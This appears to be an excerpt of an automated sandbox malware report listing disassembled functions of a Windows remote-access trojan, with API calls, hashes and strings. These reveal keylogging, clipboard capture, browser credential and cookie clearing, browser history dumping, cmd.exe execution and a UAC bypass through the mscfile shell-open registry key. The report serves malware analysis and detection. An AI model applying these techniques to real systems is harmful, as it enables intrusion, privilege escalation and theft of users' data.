            • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
            • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
            Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
            Download Yara Rule
            APIs
            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
            • CloseHandle.KERNEL32(?), ref: 004051AA
            • SetEvent.KERNEL32(?), ref: 004051B9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEventHandleObjectSingleWait
            • String ID: Connection Timeout
            • API String ID: 2055531096-499159329
            • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
            • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
            • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
            • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
            Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
            Download Yara Rule
            APIs
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw
            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
            • API String ID: 2005118841-1866435925
            • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
            • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
            • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
            • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
            Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
            Download Yara Rule
            APIs
            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
            • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
            • RegCloseKey.ADVAPI32(00000000), ref: 00412128
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: origmsc
            • API String ID: 3677997916-68016026
            • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
            • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
            • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
            • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
            Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
            Download Yara Rule
            APIs
            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExecuteShell
            • String ID: /C $cmd.exe$open
            • API String ID: 587946157-3896048727
            • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
            • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
            • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
            • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
            Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
            Download Yara Rule
            APIs
            • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
            • RegCloseKey.ADVAPI32(00000000), ref: 00412054
            Strings
            • http\shell\open\command, xrefs: 00412026
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: http\shell\open\command
            • API String ID: 3677997916-1487954565
            • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
            • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
            • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
            • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
            Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
            Download Yara Rule
            APIs
            • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
            • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
            • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
            Strings
            • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID: Software\Classes\mscfile\shell\open\command
            • API String ID: 1818849710-505396733
            • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
            • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
            • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
            • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
            Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
            Download Yara Rule
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
            • String ID: bad locale name
            • API String ID: 3628047217-1405518554
            • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
            • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
            • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
            • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
            Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
            Download Yara Rule
            APIs
            • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
            • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
            • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID: P0F
            • API String ID: 1818849710-3540264436
            • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
            • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
            • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
            • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
            Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
            • GetProcAddress.KERNEL32(00000000), ref: 004014A8
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetLastInputInfo$User32.dll
            • API String ID: 2574300362-1519888992
            • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
            • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
            • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
            • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
            Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __alldvrm$_strrchr
            • String ID:
            • API String ID: 1036877536-0
            • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
            • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
            • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
            • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
            Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
            • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
            • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
            • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
            Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
            Download Yara Rule
            APIs
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
            • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
            • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Create$CloseEventHandleObjectSingleThreadWait
            • String ID:
            • API String ID: 3360349984-0
            • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
            • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
            • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
            • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
            Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
            Download Yara Rule
            APIs
            Strings
            • [Cleared browsers logins and cookies.], xrefs: 0040B025
            • Cleared browsers logins and cookies., xrefs: 0040B036
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
            • API String ID: 3472027048-1236744412
            • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
            • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
            • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
            • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
            Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
            • Sleep.KERNEL32(00000BB8), ref: 004111DF
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseOpenQuerySleepValue
            • String ID: H"G$exepath$!G
            • API String ID: 4119054056-2148977334
            • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
            • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
            • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
            • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
            Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
              • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
              • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
            • Sleep.KERNEL32(000001F4), ref: 0040955A
            • Sleep.KERNEL32(00000064), ref: 004095F5
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Window$SleepText$ForegroundLength
            • String ID: [ $ ]
            • API String ID: 3309952895-93608704
            • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
            • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
            • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
            • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
            Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
            • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
            • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
            • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
            Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
            • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
            • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
            • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
            Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
            • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseCreateHandleReadSize
            • String ID:
            • API String ID: 3919263394-0
            • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
            • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
            • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
            • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
            Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
              • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
            • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
            • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
            Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
            Strings
            • /sort "Visit Time" /stext ", xrefs: 00404092
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
            • String ID: /sort "Visit Time" /stext "
            • API String ID: 368326130-1573945896
            • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
            • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
            • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
            • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
            Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            • __Init_thread_footer.LIBCMT ref: 0040A6E3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Init_thread_footer__onexit
            • String ID: [End of clipboard]$[Text copied to clipboard]
            • API String ID: 1881088180-3686566968
            • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
            • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
            • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
            • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
            Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: ACP$OCP
            • API String ID: 0-711371036
            • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
            • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
            • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
            • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
            Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
            Download Yara Rule
            APIs
            • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
            • IsWindowVisible.USER32(?), ref: 00415B37
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Window$TextVisible
            • String ID: (%G
            • API String ID: 1670992164-3377777310
            • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
            • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
            • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
            • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
            Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
            Download Yara Rule
            APIs
            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
            Strings
            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LocalTime
            • String ID: Connection KeepAlive | Enabled | Timeout:
            • API String ID: 481472006-507513762
            • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
            • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
            • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
